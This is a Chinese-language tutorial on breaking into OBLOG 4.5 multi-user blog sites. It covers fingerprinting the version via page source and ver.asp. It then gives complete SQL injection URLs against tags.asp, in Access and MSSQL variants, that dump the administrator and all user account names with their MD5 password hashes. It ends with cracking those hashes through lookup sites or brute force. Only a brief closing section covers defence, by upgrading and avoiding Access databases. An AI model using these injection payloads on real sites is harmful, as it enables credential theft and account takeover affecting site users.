隨著網絡技術的逐步發(fā)展，越來越多的企業(yè)擁有了自己的網站平臺，通過此平臺對外宣傳自己，對內讓員工可以更好的交流技術問題與工作事宜。OBLOG作為一款多用戶博客發(fā)布系統(tǒng)在一定程序上滿足了企業(yè)的上述種種需求，很多企業(yè)通過OBLOG安裝程序搭建簡單的站點交流平臺，然而你是否知道我們只需要一句話就可以讓OBLOG系統(tǒng)將全部用戶密碼乖乖送給入侵者嗎?今天我們就從攻防兩個角度來看看入侵者是如何通過一句話讓OBLOG將用戶密碼乖乖送上的。

　　一，判斷平臺類型以及系統(tǒng)版本：

　　在任何一次入侵之前非法入侵者都要針對目標站點，目標系統(tǒng)，目標服務器進行必要的信息收集工作，這也是最快的發(fā)現(xiàn)漏洞所在的方法。當我們將一個網站作為攻擊目標時，首先可以通過查看主頁的“源文件”來判斷其使用的站點搭建系統(tǒng)類型，然后在通過對應的命令查看站點搭建系統(tǒng)的版本。下面筆者就從攻擊實例出發(fā)進行介紹。

　　第一步：我們鎖定了一個內部網站，我們不知道該站點是使用什么類型的程序搭建的，那么我們可以通過在首頁點“查看->源文件”，然后在打開的index頁面源文件中查找相關信息，對于沒有太多豐富經驗的站點管理員來說并不會對全部版本信息進行修改，所以我們可以通過index頁面源文件的開頭或結尾查找到有用的信息。當然如果站點管理員經驗豐富的話，他會把所有蛛絲馬跡的版本泄露字眼都刪除點。

　　第二步：經過筆者查詢發(fā)現(xiàn)在index頁面結尾處有www.oblog.cn的字樣，看來這個站點系統(tǒng)是由OBLOG程序搭建的。我們也順利完成了系統(tǒng)類型的判斷工作，將入侵主要精力放到了攻擊OBLOG系統(tǒng)上。(如圖1)



圖1

　　第三步：接下來我們通過IE瀏覽器直接輸入http://ip/ver.asp，對于沒有經驗的網絡管理員來說是不會刪除這些默認的系統(tǒng)版本泄露文件的，從顯示中我們可以看到該OBLOG系統(tǒng)使用的是4.50 final build0619(access)版，版本為4.5，數據庫類型是access數據庫。(如圖2)



圖2

　　至此我們就順利的完成了目標站點的系統(tǒng)收集工作，了解了該站點是通過OBLOG搭建完成，而且使用的OBLOG安裝程序是4.50 final build0619，使用的數據庫是access。

二，根據程序與版本漏洞進行入侵：

　　不同版本，不同程序的漏洞不同，入侵方法也不同，對于OBLOG 4.50 final build0619版來說我們可以通過標簽法實現(xiàn)入侵目的，利用SQL注入漏洞讓OBLOG將全部用戶的帳戶名與密碼顯示出來。

　　第一步：通過http://ip/tags.asp命令顯示出該OBLOG系統(tǒng)的所有標簽信息。(如圖3)



圖3

　　第二步：我們隨意選擇一個標簽，要求這個標簽里面是有內容的，不能為空。里面內容包括名字，發(fā)布者與發(fā)布時間。當然還有一點特別重要那就是記下這個標簽對應的ID信息，例如筆者選擇該標簽后上方地址處對應的ID地址信息為“tags.asp?tagid=42”。(如圖4)



圖4

　　第三步：接下來就是通過一句話對OBLOG系統(tǒng)進行SQL注入入侵了，我們在之前記錄的TAGS標簽ID信息基礎上添加注入命令，例如上面看到的ID地址信息為“tags.asp?tagid=42”，那么我們輸入以下內容——

　　http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2

　　代碼中有兩處是于tagid=42相對應的，這點需要特別留意。當然如果目的站點使用的是MSSQL數據庫而不是本文介紹的ACCESS數據庫的話，相關的SQL注入代碼也要進行改變，具體內容為——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username+char(124)+password,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder

　　該命令執(zhí)行后OBLOG將把管理員的帳戶名與密碼顯示出來，我們可以在顯示頁面中看到相關信息，在|前顯示的是帳戶名，后面是密碼，不過密碼都是通過MD5加密過的。(如圖5)



圖5

第四步：除了讓OBLOG顯示管理員相關信息外我們還可以通過以下指令讓OBLOG顯示其所有用戶名與密碼信息，這也是非常危險的。具體注入代碼為——

　　http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_user union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2

　　輸入完畢所有在該OBLOG博客平臺上注冊的帳戶與密碼都會顯示出來，同樣密碼是經過MD5加密過的。(如圖6)



圖6



　　第五步：有了明文帳戶名與MD5加密過的密碼我們基本上可以直接破解出明文密碼，只需要通過一些MD5查詢站點就能夠將MD5密碼順利還原為明文信息。(如圖7)



圖7

　　第六步：不過并不是所有MD5加密密碼都能夠通過查詢站點反查出明文信息的，如果不成功的話我們只能夠通過MD5暴力破解工具實現(xiàn)了，關于MD5暴力破解工具筆者在以前的文章中進行過詳細的介紹，這里由于篇幅關系就不繼續(xù)說明了，總之暴力破解MD5密文需要的時間是比較長的，一個7位明文密碼對應MD5密碼的破解需要幾天時間。當然一些MD5密碼反查站點也提供了相關有償服務，部分密碼的反查需要我們支付一條一毛錢的費用，如果覺得暴力破解麻煩的讀者可以選擇付費服務快速解決問題。(如圖8)



圖8

　　三，如何防范：

　　該漏洞只存在于OBLOG安裝程序是4.6 final版本之前，所以作為OBLOG站點管理員的我們只需要將OBLOG版本進行必要升級，升級到最新版本即可，這樣該注入漏洞就會被順利補掉，我們也完成了安全防范目的。最新的OBLOG升級程序我們可以到www.oblog.cn站點進行下載，相關升級方法與更新彌補漏洞情況也會在升級程序的幫助文檔中詳細說明，感興趣的讀者可以自行研究。

　　四，總結：

　　網上很多現(xiàn)成的站點或CMS甚至是BLOG搭建系統(tǒng)都存在著這樣或那樣的漏洞，因此如果企業(yè)使用這些現(xiàn)成程序安裝自身網絡平臺的話就一定要隨時關注升級信息，必要時可以在相關站點注冊會員并記錄自身電子郵件地址，這樣對應程序有升級和新版本發(fā)布時我們就能夠在第一時間收到相關電子郵件獲得升級通知了。另外在搭建網絡平臺時盡量避免access數據庫的出現(xiàn)，畢竟access數據庫不太安全，相關程序存在漏洞的可能性比較大。

最新評論